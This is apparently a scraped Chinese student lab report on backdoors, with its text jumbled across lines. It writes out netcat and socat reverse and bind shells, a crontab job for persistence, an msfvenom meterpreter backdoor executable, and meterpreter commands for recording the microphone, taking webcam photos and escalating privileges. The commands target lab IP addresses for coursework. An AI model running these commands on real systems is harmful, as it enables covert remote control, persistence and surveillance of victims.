标签:参数说明 dem 官方网站 迭代 基本功 去除 inux 插入 info
ncat
是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
使用ncat.exe程序监听本机的5334
端口ncat.exe -l -p 5334
5334
端口nc 192.168.115.130 5334 -e /bin/sh
成功获得Kali的shell
,如下图所示
ifconfig
查看IP:ncat
指令监听5303
端口nc -l -p 5334
Windows
下,使用ncat.exe
程序的-e
选项项反向连接Kali主机的5334
端口ncat.exe -e cmd.exe 192.168.56.101 5334
Kali
下可以看到Windows
的命令提示,可以输入Windows
命令ncat
传输数据5334
端口:ncat.exe -l -p 5334
5334
端口ncat 192.168.56.1
建立连接之后,进行传输数据测试
ncat
进行文件传输f_out中,ncat.exe -l 5318 > f_out
nc 192.168.56.1 5334 < f_in
连接建立成功,Win可以收到kali发来的文件
Meterpreter
输出到哪个文件
crontab -e
指令编辑一条定时任务,选择编辑器时选择"34",在底行插入,意思是在每个小时的第26分钟反向连接Windows主机的5334端口在 cmd
中使用ls
进行验证
socat
socat
是ncat
的增强版,它使用的格式是socat [options] <address> <address>
,其中两个ddress
是必选项,而options
是可选项。- ocat
的基本功能就是建立两个双向的字节流,数据就在其间传输,参数``address```就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。在操作->程序或脚本中选择你的socat.exe
文件的路径,在添加参数一栏填写tcp-listen:5334 exec:cmd.exe,pty,stderr
,这个命令的作用是把cmd.exe
绑定到端口5334
,同时把cmd.exe
的stderr
重定向到stdout
上
在Kali环境下输入指令socat tcp:172.30.4.253:5334
,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5334端口,此时可以发现已经成功获得了一个cmd shell
:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=5334 -f exe > 20165334_backdoor.exe
(IP为kali的IP)生成后门程序20165334_backdoor.exe
ncat.exe -lv 5334 > 20165334_backdoor.exe
查看连接状态nc 192.168.56.1 5334 < 20165334_backdoor.exe
(此处的IP为Windows的IP)将生成的后门程序传送到Windows主机上msfconsole
指令进入msf控制台,使用监听模块,设置payload
,设置反弹回连的IP和端口20165334_backdoor
此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
record_mic
指令可以截获一段音频webcam_snap
指令可以使用摄像头进行拍照使用screenshot
指令可以进行截屏
getuid
指令查看当前用户,使用getsystem
指令进行提权(1)例举你能想到的一个后门进入到你系统中的可能方式?
ping
结果发现Linux可以ping通windows但windows不能ping通linux,参考文章解决相关问题,做了以下修改。
2018-2019-2 20165334《网络对抗技术》Exp2 后门原理与实践
标签:参数说明 dem 官方网站 迭代 基本功 去除 inux 插入 info
原文地址:https://www.cnblogs.com/ltl123/p/10573918.html